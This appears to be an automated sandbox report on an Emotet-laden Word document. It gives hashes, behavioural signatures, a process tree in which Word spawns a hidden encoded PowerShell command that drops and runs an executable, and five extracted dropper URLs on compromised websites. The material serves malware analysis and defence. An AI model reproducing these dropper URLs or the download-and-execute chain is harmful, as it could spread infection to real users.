Analysis

  • max time kernel
    26s
  • resource
    win10v191014
  • submitted
    20-01-2020 10:34

General

  • Target

    d563d2ca938193a5c92baa0fadbb293f052986310aa3df2d4ead7f249989fdd6

  • Sample

    200120-ab53w14xns

  • SHA256

    d563d2ca938193a5c92baa0fadbb293f052986310aa3df2d4ead7f249989fdd6

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://blog.hasilkan.com/cgi-bin/LxoH/

exe.dropper

http://luatsusaigon.info/libs/zgis/

exe.dropper

https://primalis.com.vn/wp-content/uploads/2020/rxm/

exe.dropper

https://womenhealth.aureliusconferences.com/events/bYIkt2OE/

exe.dropper

https://travelciwidey.com/wp-includes/kaU705/

Extracted

Family

emotet

C2


rsa_pubkey.plain

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d563d2ca938193a5c92baa0fadbb293f052986310aa3df2d4ead7f249989fdd6.doc" /o ""
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:5004
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en [Base64-encoded command]
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Users\Admin\45.exe
      "C:\Users\Admin\45.exe"
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4440
      • C:\Users\Admin\45.exe
        --9a306e6b
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:3780

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\45.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • memory/3780-11-0x0000000000710000-0x0000000000727000-memory.dmp
    Filesize

    92KB

  • memory/3780-12-0x0000000000400000-0x0000000000451000-memory.dmp
    Filesize

    324KB

  • memory/4440-8-0x00000000005F0000-0x0000000000607000-memory.dmp
    Filesize

    92KB